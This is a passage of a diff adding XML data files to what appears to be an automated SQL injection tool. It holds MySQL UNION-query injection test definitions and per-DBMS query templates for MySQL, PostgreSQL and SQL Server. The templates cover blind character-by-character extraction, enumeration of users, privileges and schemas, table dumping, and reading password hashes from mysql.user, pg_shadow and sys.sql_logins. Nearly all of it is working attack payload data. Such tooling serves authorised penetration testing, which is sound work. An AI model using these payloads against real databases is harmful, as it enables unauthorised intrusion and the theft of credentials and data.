+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <!-- End of UNION query tests -->
+</root>
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -0,0 +1,875 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- MySQL -->
+    <dbms value="MySQL">
+        <cast query="CAST(%s AS CHAR)"/>
+        <length query="CHAR_LENGTH(%s)"/>
+        <isnull query="IFNULL(%s,' ')"/>
+        <delimiter query=","/>
+        <limit query="LIMIT %d,%d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="-- -" query2="/*" query3="#"/>
+        <substring query="MID((%s),%d,%d)"/>
+        <concatenate query="CONCAT(%s,%s)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="HEX(%s)"/>
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        <banner query="VERSION()"/>
+        <current_user query="CURRENT_USER()"/>
+        <current_db query="DATABASE()"/>
+        <hostname query="@@HOSTNAME"/>
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        <users>
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user"/>
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
+        </users>
+        <!-- https://github.com/dev-sec/mysql-baseline/issues/35 -->
+        <!-- https://stackoverflow.com/a/31122246 -->
+        <passwords>
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
+        </passwords>
+        <privileges>
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
+        </privileges>
+        <roles/>
+        <statements>
+            <inband query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST"/>
+            <blind query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST ORDER BY ID LIMIT %d,1" query2="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE ID=%d" query3="SELECT ID FROM INFORMATION_SCHEMA.PROCESSLIST LIMIT %d,1" count="SELECT COUNT(DISTINCT(INFO)) FROM INFORMATION_SCHEMA.PROCESSLIST"/>
+        </statements>
+        <dbs>
+            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT db FROM mysql.db"/>
+            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" query2="SELECT database_name,table_name FROM mysql.innodb_table_stats" condition="table_schema" condition2="database_name"/>
+            <blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' LIMIT %d,1" query2="SELECT table_name FROM mysql.innodb_table_stats WHERE database_name='%s' LIMIT %d,1" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count2="SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
+            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
+            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s.%s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" query2="SELECT db FROM mysql.db WHERE %s" condition="schema_name" condition2="db"/>
+            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" query2="SELECT DISTINCT(db) FROM mysql.db WHERE %s" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db WHERE %s" condition="schema_name" condition2="db"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
+            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
+            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
+        </search_column>
+    </dbms>
+
+    <!-- PostgreSQL -->
+    <dbms value="PostgreSQL">
+        <cast query="CAST(%s AS CHARACTER(10000))"/>
+        <length query="LENGTH(%s)"/>
+        <isnull query="COALESCE(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="OFFSET %d LIMIT %d"/>
+        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" OFFSET "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <substring query="SUBSTRING((%s)::text FROM %d FOR %d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
+        <hex query="ENCODE(CONVERT_TO((%s),'UTF8'),'HEX')"/>
+        <inference query="ASCII(SUBSTRING((%s)::text FROM %d FOR 1))>%d"/>
+        <banner query="VERSION()"/>
+        <current_user query="CURRENT_USER"/>
+        <current_db query="CURRENT_SCHEMA()"/>
+        <hostname/>
+        <!--<table_comment query="SELECT pg_catalog.obj_description(c.oid) FROM pg_catalog.pg_class c WHERE c.relname='%s'"/>-->
+        <table_comment query="SELECT description FROM pg_description JOIN pg_class ON pg_description.objoid=pg_class.oid JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid WHERE nspname='%s' AND relname='%s'"/>
+        <column_comment query="SELECT col_description(pg_class.oid,pg_attribute.attnum) FROM pg_class JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid JOIN pg_attribute ON pg_class.oid=pg_attribute.attrelid WHERE nspname='%s' AND relname='%s' AND attname='%s'"/>
+        <is_dba query="(SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)"/>
+        <check_udf query="(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)"/>
+        <users>
+            <inband query="SELECT usename FROM pg_user"/>
+            <blind query="SELECT DISTINCT(usename) FROM pg_user OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
+        </users>
+        <passwords>
+            <inband query="SELECT usename,passwd FROM pg_shadow" condition="usename"/>
+            <blind query="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
+        </passwords>
+        <privileges>
+            <inband query="SELECT usename,(CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user" condition="usename"/>
+            <blind query="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
+        </privileges>
+        <roles/>
+        <statements>
+            <inband query="SELECT query FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
+            <blind query="SELECT DISTINCT(query) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(query)) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
+        </statements>
+        <dbs>
+            <inband query="SELECT schemaname FROM pg_tables"/>
+            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT schemaname,tablename FROM pg_tables" condition="schemaname"/>
+            <blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT attname,typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
+            <blind query="SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'" count="SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
+            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT datname FROM pg_database WHERE %s" condition="datname"/>
+            <blind query="SELECT DISTINCT(datname) FROM pg_database WHERE %s" count="SELECT COUNT(DISTINCT(datname)) FROM pg_database WHERE %s" condition="datname"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT schemaname,tablename FROM pg_tables WHERE %s" condition="tablename" condition2="schemaname"/>
+            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s" query2="SELECT tablename FROM pg_tables WHERE schemaname='%s'" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s" count2="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'" condition="tablename" condition2="schemaname"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT nspname,relname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" condition="attname" condition2="nspname" condition3="relname"/>
+            <blind query="SELECT DISTINCT(nspname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" query2="SELECT DISTINCT(relname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'" count="SELECT COUNT(DISTINCT(nspname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" count2="SELECT COUNT(DISTINCT(relname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'" condition="attname" condition2="nspname" condition3="relname"/>
+        </search_column>
+    </dbms>
+
+    <!-- Microsoft SQL Server -->
+    <dbms value="Microsoft SQL Server">
+        <cast query="CAST(%s AS NVARCHAR(4000))"/>
+        <length query="LTRIM(STR(LEN(%s)))"/>
+        <isnull query="ISNULL(%s,' ')"/>
+        <delimiter query="+"/>
+        <limit query="SELECT TOP %d "/>
+        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
+        <limitgroupstart query="2"/>
+        <limitgroupstop query="1"/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <substring query="SUBSTRING((%s),%d,%d)"/>
+        <concatenate query="%s+%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
+        <hex query="master.dbo.fn_varbintohexstr(CAST(%s AS VARBINARY(8000)))"/>
+        <inference query="UNICODE(SUBSTRING((%s),%d,1))>%d"/>
+        <banner query="SELECT @@VERSION"/>
+        <current_user query="SELECT SYSTEM_USER"/>
+        <current_db query="SELECT DB_NAME()"/>
+        <hostname query="@@SERVERNAME"/>
+        <table_comment query="SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s',NULL,NULL)"/>
+        <column_comment query="SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s','column','%s')"/>
+        <is_dba query="IS_SRVROLEMEMBER('sysadmin')=1" query2="IS_SRVROLEMEMBER('sysadmin','%s')=1"/>
+        <users>
+            <inband query="SELECT name FROM master..syslogins" query2="SELECT name FROM sys.sql_logins"/>
+            <!-- NOTE: in NOT IN kind of queries ORDER BY is a must -->
+            <blind query="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins ORDER BY name) ORDER BY name" query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins" count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
+        </users>
+        <passwords>
+            <inband query="SELECT name,master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name,master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
+            <blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s' ORDER BY password) ORDER BY password" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password_hash NOT IN (SELECT TOP %d password_hash FROM sys.sql_logins WHERE name='%s' ORDER BY password_hash) ORDER BY password_hash" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
+        </passwords>
+        <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
+        <privileges/>
+        <roles/>
+        <statements>
+            <inband query="SELECT st.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
+            <blind query="SELECT TOP 1 a.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) a WHERE a.text NOT IN (SELECT TOP %d b.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) b ORDER BY b.text) ORDER BY a.text" count="SELECT LTRIM(STR(COUNT(st.text))) FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
+        </statements>
+        <dbs>
+            <inband query="SELECT name FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/>
+            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT name FROM %s..sysobjects WHERE xtype = 'U'"/>
+            <blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name" count2="SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype = 'U' AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype = 'U' ORDER BY name) ORDER BY name" count3="SELECT COUNT(name) FROM %s..sysobjects WHERE xtype = 'U'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" condition="[DB]..syscolumns.name"/>
+            <blind query="SELECT TOP 1 %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' AND %s..syscolumns.name NOT IN (SELECT TOP %d %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' ORDER BY %s..syscolumns.name) ORDER BY %s..syscolumns.name" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query3="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s.%s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
+            <blind query="SELECT name FROM master..sysdatabases WHERE %s" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases WHERE %s" condition="name"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') AND " condition="name" condition2="name"/>
+            <blind query="SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') " count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')" condition="name" condition2="name"/>
